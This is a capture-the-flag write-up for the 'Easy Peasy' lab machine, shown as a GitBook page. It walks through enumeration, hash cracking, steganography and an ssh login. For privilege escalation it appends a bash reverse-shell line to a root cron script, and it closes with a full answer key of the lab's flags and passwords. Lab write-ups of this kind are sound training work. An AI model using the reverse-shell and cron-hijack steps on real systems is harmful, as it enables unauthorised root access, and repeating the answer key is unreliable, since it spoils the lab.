🙌
Writeups
LearningLinkedIn
  • The Great Escape
  • Lookback
  • Outlook NTLM Leak
  • Year of the Fox
  • PS Eclipse
  • Eavesdropper
  • Tony the Tiger
  • Intro to Offensive Security
  • MD2PDF
  • Content Security Policy
  • Agent T
  • Introduction to Flask
  • Atlas
  • Bugged
  • Sigma
  • Intro to Cloud Security
  • Holo
  • CCT2019
  • Opacity
  • Empline
  • Phishing Emails 5
  • BlueTeam
  • Tempest
  • hackerNote
  • Watcher
  • CMesS
  • HA Joker CTF
  • OWASP Top 10 2021
  • Metasploit
  • Oh My WebServer
  • Road
  • Anonymous
  • Ollie
  • Training for New Analyst
  • Tokyo Ghoul
  • Dependency Management
  • KoTH Food CTF
  • Android Malware Analysis
  • Intro To Pwntools
  • AD Certificate Templates
  • CVE 2022 26923
  • Basic Static Analysis
  • Introduction To Honeypots
  • Intro to Pipeline Automation
  • Intro to Containerisation
  • ARP Spoofing
  • Mindgames
  • Brute Force Heroes
  • SQLMAP
  • Insekube
  • TakeOver
  • Boiler CTF
  • GoldenEye
  • Splunk 3
  • Tempus Fugit Durius
  • Warzone 1
  • OWASP API Security Top 10 2
  • Temple
  • AllSignsPoint2Pwnage
  • OWASP API Security Top 10 1
  • Secret Recipe
  • NoNameCTF
  • Binex
  • Jack
  • Tactical Detection
  • Jurassic Park
  • DX1 Liberty Island
  • Brute
  • Biblioteca
  • Napping
  • Kubernetes for Everyone
  • 0day
  • Osiris
  • Set
  • NoSQL injection Basics
  • Warzone 2
  • Atlassian, CVE 2022 26134
  • Jason
  • VulnNet: Roasted
  • VulnNet Internal
  • VulnNet Node
  • Brooklyn Nine Nine
  • Thompson
  • The Cod Caper
  • Neighbour
  • ColddBox Easy
  • Library
  • All in One
  • Poster
  • Gallery
  • Cat Pictures
  • Boogeyman 1
  • Corridor
  • Team
  • Ra 2
  • Advent of Cyber 2022
  • Bookstore
  • Intro to Malware Analysis
  • TheHive Project
  • Velociraptor
  • KAPE
  • Lunizz CTF
  • Linux Forensics
  • DFIR An Introduction
  • Benign
  • Cyborg
  • Year of the rabbit
  • Blaster
  • Easy Peasy
  • Couch
  • Chocolate Factory
  • REmux The Tmux
  • Spring4Shell
  • Dirty Pipe
  • OverlayFS
  • Pwnkit
  • CTF collection Vol.2
  • Gotta Catch'em All!
  • Break Out The Cage
  • Bolt
  • Source
  • AttackerKB
  • Intro to Defensive Security
  • Careers in Cyber
  • OSI Model
  • Packets&Frames
  • Extending Your Network
  • How websites work
  • Putting it all together
  • Operating System Security
  • Network Security
  • Security Operations
  • Network Services
  • Network Services 2
  • Active Directory Basics
  • Attacking Kerberos
  • Subdomain Enumeration
  • Authentication Bypass
  • IDOR
  • File Inclusion
  • Masterminds
  • SSRF
  • Command Injection
  • Cross site Scripting
  • Burp Suite Extender
  • Burp Suite Intruder
  • Surfer
  • Willow
  • Conti
  • Unattended
  • Tardigrade
Powered by GitBook
On this page

Was this helpful?

Easy Peasy

rustscan

port 80,6498,65524

NGINX es un servidor web open source de alta performance que ofrece el contenido estático de un sitio web de forma rápida y fácil de configurar. Ofrece recursos de equilibrio de carga, proxy inverso y streaming, además de gestionar miles de conexiones simultáneas.

gobuster

gobuster dir --url http://10.10.60.150 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt

found hidden then whatever paths

cyberchef

ZmxhZ3tmMXJzN19mbDRnfQ== recipe from base64

a18672860d0510e5ab6699730763b250 found 10.10.60.150:65524/robots.txt md5hashing

sourcode 10.10.60.150:65524 flag{9fdafbd64c47471a8f54cd3fc64cd312}

its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu

==from base62 /n0th1ng3ls3m4tt3r==

john

==hash found in hidden dir -> 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81==

john --wordlist=/home/kali/Downloads/easypeasy/easypeasy.txt hash --format=GOST

mypasswordforthatjob

steghide

download the matrix img

steghide extract -sf binarycodepixabay.jpg
cat secrettext.txt

username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

cyberchef -> boring:iconvertedmypasswordtobinary

ssh

ssh boring@10.10.60.150 -p 6498

found synt{a0jvgf33zfa0ez4y} -> rot13 flag{n0wits33msn0rm4l}

priv esc

cat /etc/crontab

There is an interesting cron job being run .mysecretcronjob.sh every minute. We can see that it is being run by root.

ls -all /var/www/.mysecretcronjob.sh 

-rwxr-xr-x 1 boring boring 33 Jun 14 2020 /var/www/.mysecretcronjob.sh

revshells

echo 'bash -i >& /dev/tcp/10.18.1.00/4444 0>&1' >> /var/www/.mysecretcronjob.sh

kali machine

rlwrap nc -nlvp 4444 
cd /root
ls -all

found it .root.txt > flag{63a9f0ea7bb98050796b649e85481845}

  • How many ports are open? 3

  • What is the version of nginx?1.16.1

  • What is running on the highest port?Apache

  • Using GoBuster, find flag 1.flag{f1rs7_fl4g}

  • Further enumerate the machine, what is flag 2?flag{1m_s3c0nd_fl4g}

  • Crack the hash with easypeasy.txt, What is the flag 3?flag{9fdafbd64c47471a8f54cd3fc64cd312}

  • What is the hidden directory?/n0th1ng3ls3m4tt3r

  • Using the wordlist that provided to you in this task crack the hash what is the password? mypasswordforthatjob

  • What is the password to login to the machine via SSH?iconvertedmypasswordtobinary

  • What is the user flag?flag{n0wits33msn0rm4l}

  • What is the root flag? flag{63a9f0ea7bb98050796b649e85481845}

[[Chocolate Factory]]

PreviousBlasterNextCouch

Last updated 2 years ago

Was this helpful?